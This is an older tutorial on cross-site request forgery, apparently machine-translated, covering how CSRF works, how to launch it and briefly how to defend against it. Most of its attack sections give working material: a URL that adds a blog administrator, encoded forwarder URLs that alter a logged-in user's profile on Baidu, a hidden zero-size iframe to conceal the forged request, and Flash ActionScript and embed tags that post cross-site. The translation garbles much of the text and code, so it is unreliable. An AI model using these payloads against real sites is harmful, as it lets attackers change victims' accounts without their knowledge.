Csrf-Attack and Defense
Author: lake2
0x01 what is a csrf attack
Csrf is the abbreviation of Cross Site Request Forgery (xsrf, that is, perform get/post operations on a CGI in a user session. Users may not know and want to do these tasks. You can hijack HTTP sessions.
Websites use cookies to identify users. After a user successfully performs identity authentication, the browser will obtain a cookie that identifies the user. You only need to disable the browser or log out, in the future, the website will contain the cookie. If the browser is controlled by a person who requests the URL of the site during this period, some functions that the user does not want to do (such as modifying Personal Data) may be run ). Because this is not the request that the user really wants to send, this is the so-called Request Forgery. Haha, because these requests can also be submitted from a third-party site, they were once suffixed with cross-site.
For example, a BBS can map and write the Logout link in the URL of the texture. After reading this post, the user will log out, the user asked the Logout link as his identity. In the user's opinion, there is a problematic "image" in the post, rather than wanting to quit, however, the program will feel that the user needs to log out and destroy the session. This is the legendary csrf attack.
Don't underestimate the csrf. Remember that l-blog once had a csrf Vulnerability (I didn't know the concept at the time: P). It adds the Administrator with this link: http: // localhost/L-blog/admincp. asp? Action = Member & type = editmem & memid = 2 & memtype = supadmin; there is also the Google csrf vulnerability [1], which will lead to email leaks. In addition, do not think that only XSS can generate worms, but only the appropriate conditions. The same csrf is possible.
0x02 Where are threats from?
Paster is only a get method. In many cases, we need to forge POST requests. One solution is to use cross-site. Of course, the target site may not exist. In this case, we can launch attacks from third-party sites.
For example, if I want to attack a problematic blog, I should leave a comment on the target blog and leave a website address to lure the host to click it. (This depends on your flickering skills: P ), then construct an HTML form to submit some data.
The multi-form browser is helpful.
Multi-form browsers (Firefox, roaming, myie ......) Convenience also brings about some problems at the same time, because the new forms opened by the multi-form browser have all the current sessions. That is, I used IE to log on to my blog. Then I want to watch the news and execute another IE process. At this time, the sessions of the two ie forms are independent of each other, from ie sending requests to the blog, there will be no cookie for my logon. However, multiple forms browsers always have only one process, and sessions of various forms are common, that is, when you send a request to the blog, the cookie that I log on to the blog will be taken.
Think about it. When we click a link left by someone else in blog/BBS/webmail, a well-prepared csrf attack may be waiting for us.
0x03 initiate a csrf attack
A third-party website uses post to launch a csrf attack. It uses JavaScript to actively submit a form to the target CGI. It is not very convenient to write forms every time. The auxiliary tools include XSS post forwarder [2] and csrf redirector [3]. Here I also wrote the corresponding ASP version [4]. When using it, you only need to transmit the submitted URL and token to it, and it will automatically post it to the target.
For example, I want to submit some data to www.0x54.org/a.asp:http://www.0x54.org/lake2/xss_post_forwarder.asp? Lake2 = http://www.0x54.org/a.asp&a=123& B =321&c=%26%23%25 (here you need to consider URL encoding)
You have to think about how to trick users into our web pages.
0x04 one instance
Since csrf is not as eye-catching as XSS, it is still very easy to find a web application with csrf. This time our goal is Baidu, just for test.
Whatever way you use, let a user who has logged into Baidu login ask this URL: http://www.0x54.org/lake2/xss_post_forwarder.asp? Lake2 = export protected] & SDV = & Zodiac = 0 & birth_year = 0 & birth_month = 0 & birth_day = 0 & blood = 0 & bs0 = % C7 % EB % D1 % a1 % d4 % F1 & BS1 = % C7 % EB % D1 % a1 % D4 % F1 & bs2 = % Ce % de & txt_bs = & birth_site = % 3B % 3B & B % 3drs0 = % C7 % EB % D1 % a1 % D4 % F1 & RS1 = % C7 % EB % D1 % a1 % D4 % F1 & rs2 = % Ce % de & txt_rs = & reside_site = % 3B % 3B
Then, check whether the personal data of the person has been changed. This is a bit depressing. When the person asks the URL, the browser will return to the page where the data changes are successful, and we will be found. Is there a way to prevent the browser from refreshing?
Yes.
One way is to construct this HTML code with IFRAME: <IFRAME width = 0 Height = 0 src = "http://www.0x54.org/lake2/xss_post_forwarder.asp? Lake2 = export protected] & SDV = & Zodiac = 0 & birth_year = 0 & birth_month = 0 & birth_day = 0 & blood = 0 & bs0 = % C7 % EB % D1 % a1 % d4 % F1 & BS1 = % C7 % EB % D1 % a1 % D4 % F1 & bs2 = % Ce % de & txt_bs = & birth_site = % 3B % 3B & B % 3drs0 = % C7 % EB % D1 % a1 % D4 % F1 & RS1 = % C7 % EB % D1 % a1 % D4 % F1 & rs2 = % Ce % de & txt_rs = & reside_site = % 3B % 3B "> </iframe>
Another way is to use flash.
0x05 csrf with Flash
Flash can submit data to a random URL. Open the pirated Adobe Flash CS 3 Professional, create a flash file (ActionScript 3.0), and right-click the default layer to select the action, then add the following code:
:
Import flash.net. URLRequest;
Import flash. system. Security;
VaR url = new URLRequest ("http://www.0x54.org/lake2 ");
VaR Lake = new urlvariables ();
Lake = "A = lake2 ";
URL. method = "Post ";
URL. Data = lake;
Sendtourl (URL );
Stop ();
Export as SWF file, capture asked, capture a packet to see the effect of a little: http://www.0x54.org/lake2/flash/test1.html
Every time I write as and compile SWF, It is very troublesome. According to csrf redirector's idea, I wrote a similar Flash program [5], and then I tried it with Baidu, the web page with the following HTML for example: <embed src = "http://www.0x54.org/lake2/flash/flash_hacking.swf? F = 1 & t = export protected] % 26sdv % 3d % 26 Zodiac % 3d0% 26birth_year % 3d0% 26birth_month % 3d0% 26birth_day % 3d0% 26 blood % 3d0% 26bs0% 3d % 25c7% 25eb % 25d1% 25a1% 25d4% 25f1% 26bs1% 3d % 25c7% 25eb % 25d1% 25a1% 25d4% 25f1% 26bs2% 3d % 25ce % 25de % 26txt_bs % 3d % 26birth_site % 3d % 253b % 253b % 26B % 253drs0% 3d % 25c7% 25eb % 25d1% 25a1% 25d4% 25f1% 26rs1% 3d % 25c7% 25eb % 25d1% 25a1% 25d4% 25f1% 26rs2% 3d % 25ce % 25de % 26txt_rs % 3d % 26reside_site % 3d % 253b % 253b "> </embed> (pay attention to URL secondary encoding)
In fact, flash can get the returned content. If the returned content has sensitive information, it can read it and send it to the controlled Web. Of course, it depends on whether the target website allows flash to retrieve content across domains.
0x06 csrf
Checking for the csrf vulnerability is a physical activity. capture a normal request packet first, remove the Referer field, and submit again. If it is still valid, there is basically a problem. Of course, the number of parts may contain the number of parts that cannot be preemptible (for example, userid or something). At this time, it depends on whether the number of parts that cannot be preemptible can be obtained through other means, such as flash. If yes, the problem persists. Also, try to change post to get, because some programs do not distinguish get/post.
The functions and return forms of the application are different, so it is still a little difficult to take the initiative to test the csrf vulnerability. The OWASP tool named csrftester above is better to give it a try [6]
0x07 defense csrf
WAF defends against csrf vulnerabilities in Web application tokens. Generally, Referer, Token, or verification code are used. The Nexus article [7] has been fully written; superhei also proposed the bypass idea [8]. Please refer to their article.
Another idea is to defend against the client, which seems to be a software similar to HTTP watch, which can be used in a browser to intercept or filter cross-domain cookies.
0x08 Summary
I hope this article will help you. At the same time, you are welcome to share with me: [email protected]
[Reference]
[1] Google Gmail e-mail hijack technique, http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/
[2] XSS post forwarder, http://whiteacid.org/misc/xss_post_forwarder.php
[3] csrf redirector, http://shiflett.org/blog/2007/jul/csrf-redirector
[4] asp xss post forwarder download (comes with an HTML Version), http://www.0x54.org/lake2/xss_post_forwarder.zip
[5] source code and compiled SWF File Download: http://www.0x54.org/lake2/flash/flash_hacking.rar
[6] http://www.owasp.org/index.php/Category:OWASP_CSRFTester_Project, csrftester
[7] preventing csrf, http://www.playhack.net/view.php? English version, http://www.hanguofeng.cn/archives/security/preventing-csrf
Bypass preventing csrf, http://www.xfocus.net/articles/200801/964.html
Csrf-Attack and Defense